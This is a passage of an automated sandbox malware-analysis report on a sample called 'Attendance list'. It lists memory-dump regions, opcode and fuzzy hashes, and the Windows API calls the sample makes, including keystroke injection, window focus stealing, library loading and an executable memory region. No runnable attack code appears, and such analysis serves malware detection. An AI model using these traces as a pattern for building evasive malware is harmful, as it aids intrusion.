                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 463c958743b79090836b8d5a4b06208c417af90e752fbf8ff111adf4b1660c6f
                        • Instruction ID: eb3144d6058d82ecd8c000077159337ce05f59c80f42e1d5573399092557c7c3
                        • Opcode Fuzzy Hash: 463c958743b79090836b8d5a4b06208c417af90e752fbf8ff111adf4b1660c6f
                        • Instruction Fuzzy Hash: 63515735600614AFCF14EB68C995FAE77A6FF85310F1481A9F956AB382CB30ED408B52
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                        • Instruction ID: e51a955d1d30793dfa4129c88f05ecc72ffe3f0b9427ed7bba345b8e1dd0ccc5
                        • Opcode Fuzzy Hash: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                        • Instruction Fuzzy Hash: CA317A79208A069FC7249F19D490E22F7B0FF09310B14C56DE98ACB7A5EB30E891CF84
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 008C5CF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 2c2131aba045d77a2b9bd6b711c3deae360783d10b392f69d2a5a43a5237ca11
                        • Instruction ID: 05554347623f2d865fd6b89cb46c53c878db582cc8215b8f0f57453235c21bb5
                        • Opcode Fuzzy Hash: 2c2131aba045d77a2b9bd6b711c3deae360783d10b392f69d2a5a43a5237ca11
                        • Instruction Fuzzy Hash: F5311771A00B0AABCF18DF2DC484A69B7B5FB48320F148629E81AD3714D771F9A0DB91
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 6aade6d75e2a2e41958e1959cf93a8a9721b8994b983c1c81e761349d809847e
                        • Instruction ID: 4124438dee0f8c73213d8310a84accb28ea78fbd6fc5ad38ae1427a89821359d
                        • Opcode Fuzzy Hash: 6aade6d75e2a2e41958e1959cf93a8a9721b8994b983c1c81e761349d809847e
                        • Instruction Fuzzy Hash: 3D41D2745087558FDB24DF18C484F1ABBE0FF85318F19889CE99A8B762C732E885CB52
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                        • Instruction ID: 31a6a862b9591521e1994850ecb239514b085bb510e31c595ef442d2f3f1e1cc
                        • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                        • Instruction Fuzzy Hash: 4A11B132208215AFD714DF2CC881E6EB7B9FF45324724851EE916DB2A1DB32EC118B91
                        APIs
                          • Part of subcall function 008C4D13: FreeLibrary.KERNEL32(00000000,?), ref: 008C4D4D
                          • Part of subcall function 008E548B: __wfsopen.LIBCMT ref: 008E5496
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4F6F
                          • Part of subcall function 008C4CC8: FreeLibrary.KERNEL32(00000000), ref: 008C4D02
                          • Part of subcall function 008C4DD0: _memmove.LIBCMT ref: 008C4E1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: 7f13fdb57b3c640983ea9942ba313915a2bbf8b7ed117a10fca37fe1c9e0e9c0
                        • Instruction ID: 86e61c54c20e9eaceae7f3785ace8c3125b55fcda74b8cd01830cf689b009422
                        • Opcode Fuzzy Hash: 7f13fdb57b3c640983ea9942ba313915a2bbf8b7ed117a10fca37fe1c9e0e9c0
                        • Instruction Fuzzy Hash: 3211E231610609AACB10BF78D822F6E72B5EB40701F10842DF942E6181DEB1DA409761
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 8de892c02e54569b7399dea5d67ebfb8d2f016f350fc11724261a8e9a83c3989
                        • Instruction ID: 5861cb23a35065fad8eef3863a406481fcba4203108d5840842f218126fa975e
                        • Opcode Fuzzy Hash: 8de892c02e54569b7399dea5d67ebfb8d2f016f350fc11724261a8e9a83c3989
                        • Instruction Fuzzy Hash: A921EE74508345DFCB28DF54C444F1ABBE0FB85708F04896CE99A97761D731E845CB92
                        APIs
                        • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,008C5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 008C5D76
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: add8a5b5b365410ab04dc4b42b7aebe32c51ccc878ca5e06c64261e8d18674fe
                        • Instruction ID: 94baaf2e5a2fda4707abb10aa5e65cec6331d65c4b4d0117e3b1412484d1b581
                        • Opcode Fuzzy Hash: add8a5b5b365410ab04dc4b42b7aebe32c51ccc878ca5e06c64261e8d18674fe
                        • Instruction Fuzzy Hash: 2E112871204B059FDB208F15C884F62B7F5FB45750F14C92EE6AB86A50D770F985CB60
                        APIs
                        • __lock_file.LIBCMT ref: 008E4AD6
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: db4de2e9ecd01cb90d3300327a9b1d3f8fcc7a83a98c04368e85aec2a3dd41a7
                        • Instruction ID: ca3b707fd67937728dcd02d690c8916dafa62d40aa8e0ead6d31a78c1ffbb254
                        • Opcode Fuzzy Hash: db4de2e9ecd01cb90d3300327a9b1d3f8fcc7a83a98c04368e85aec2a3dd41a7
                        • Instruction Fuzzy Hash: 3AF08131940299EBDB51AF6A8C0639E3661FF42335F148514B42CEA1D1DB788950DB52
                        APIs
                        • FreeLibrary.KERNEL32(?,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4FDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 21bb40ad71e0f6e84c8600943ebe383b22de5b202781002411dd9aa09ee7a4a2
                        • Instruction ID: 1d8ca5894fc4ad02e7d629686cc9e0489046c2e7f7af31614b17c067f8fa9673
                        • Opcode Fuzzy Hash: 21bb40ad71e0f6e84c8600943ebe383b22de5b202781002411dd9aa09ee7a4a2
                        • Instruction Fuzzy Hash: 04F0F271119712CFCB349F64E4A4D12BBF1FB053293209A2EE59682610CB32A884DB40
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E09F4
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LongNamePath_memmove
                        • String ID:
                        • API String ID: 2514874351-0
                        • Opcode ID: aa5ced77d94e6d37edbe9e1d90e64f2c680250b4b6384650fb1d299f6663a549
                        • Instruction ID: d0bb5e54a2af237f72d1c1cdc5fcfb45a4f2f6b984d6b92c27a2069da75a2f35
                        • Opcode Fuzzy Hash: aa5ced77d94e6d37edbe9e1d90e64f2c680250b4b6384650fb1d299f6663a549
                        • Instruction Fuzzy Hash: 6CE086369052289BC720D66C9C05FFA77ADEF897A0F0401B5FD0CD7208D9A59C818691
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                        • Instruction ID: b1077e86985307cedc475ebb02aad8d7133d2d4bc56d746d05a3351e2ff0f191
                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                        • Instruction Fuzzy Hash: 01E092B0118B505FD7388A24E8107E373E4FB06315F00081CF29AC3342EB6278418759
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008FE16B,?,?,00000000), ref: 008C5DBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 5711e57903e17e31330ca7273688b5d14fd2d76a9ba0b110e3b71cdc830282fc
                        • Instruction ID: e09cbf04d6b34d4396ceb2f167052b10de1b1ecb9a3a30fcd0e0a3cc70b7c135
                        • Opcode Fuzzy Hash: 5711e57903e17e31330ca7273688b5d14fd2d76a9ba0b110e3b71cdc830282fc
                        • Instruction Fuzzy Hash: 73D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27D509795
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: 0a4c8829ccfe2dd9111a9f28e6dd926ea0d1b545a9c7134b2a701d5510f25324
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 37B092B684020C77DE022E86EC02A593B19AB4167CF808020FB0C181A2A673E6A0968E
                        APIs
                        • GetLastError.KERNEL32(00000002,00000000), ref: 0092D46A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLast
                        • String ID:
                        • API String ID: 1452528299-0
                        • Opcode ID: 2fa5093c4e00b702019072a2d1d85b6b67abd76d33fc7a3bdb3e5176e9671290
                        • Instruction ID: 2ee8ef16e920d71f89ee251c7d72f449bf545fb9aa494324642e9c3ee87c1181
                        • Opcode Fuzzy Hash: 2fa5093c4e00b702019072a2d1d85b6b67abd76d33fc7a3bdb3e5176e9671290
                        • Instruction Fuzzy Hash: CA714D302093128FCB14EF28D491F6AB7E4FF89314F04496DF4969B2A6DB74E949CB52
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 00E822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0094CE50
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094CE91
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0094CED6
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094CF00
                        • SendMessageW.USER32 ref: 0094CF29
                        • _wcsncpy.LIBCMT ref: 0094CFA1
                        • GetKeyState.USER32(00000011), ref: 0094CFC2
                        • GetKeyState.USER32(00000009), ref: 0094CFCF
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0094CFE5
                        • GetKeyState.USER32(00000010), ref: 0094CFEF
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0094D018
                        • SendMessageW.USER32 ref: 0094D03F
                        • SendMessageW.USER32(?,00001030,?,0094B602), ref: 0094D145
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0094D15B
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0094D16E
                        • SetCapture.USER32(?), ref: 0094D177
                        • ClientToScreen.USER32(?,?), ref: 0094D1DC
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0094D1E9
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0094D203
                        • ReleaseCapture.USER32 ref: 0094D20E
                        • GetCursorPos.USER32(?), ref: 0094D248
                        • ScreenToClient.USER32(?,?), ref: 0094D255
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094D2B1
                        • SendMessageW.USER32 ref: 0094D2DF
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094D31C
                        • SendMessageW.USER32 ref: 0094D34B
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0094D36C
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0094D37B
                        • GetCursorPos.USER32(?), ref: 0094D39B
                        • ScreenToClient.USER32(?,?), ref: 0094D3A8
                        • GetParent.USER32(?), ref: 0094D3C8
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0094D431
                        • SendMessageW.USER32 ref: 0094D462
                        • ClientToScreen.USER32(?,?), ref: 0094D4C0
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0094D4F0
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0094D51A
                        • SendMessageW.USER32 ref: 0094D53D
                        • ClientToScreen.USER32(?,?), ref: 0094D58F
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0094D5C3
                          • Part of subcall function 008C25DB: GetWindowLongW.USER32(?,000000EB), ref: 008C25EC
                        • GetWindowLongW.USER32(?,000000F0), ref: 0094D65F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 3977979337-4164748364
                        APIs
                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0094873F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: %d/%02d/%02d
                        • API String ID: 3850602802-328681919
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove$_memset
                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                        • API String ID: 1357608183-1798697756
                        APIs
                        • GetForegroundWindow.USER32(00000000,?), ref: 008C4A3D
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008FDA8E
                        • IsIconic.USER32(?), ref: 008FDA97
                        • ShowWindow.USER32(?,00000009), ref: 008FDAA4
                        • SetForegroundWindow.USER32(?), ref: 008FDAAE
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008FDAC4
                        • GetCurrentThreadId.KERNEL32 ref: 008FDACB
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 008FDAD7
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008FDAE8
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008FDAF0
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 008FDAF8
                        • SetForegroundWindow.USER32(?), ref: 008FDAFB
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB10
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB1B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB25
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB2A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB33
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB38
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB42
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB47
                        • SetForegroundWindow.USER32(?), ref: 008FDB4A
                        • AttachThreadInput.USER32(?,?,00000000), ref: 008FDB71
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
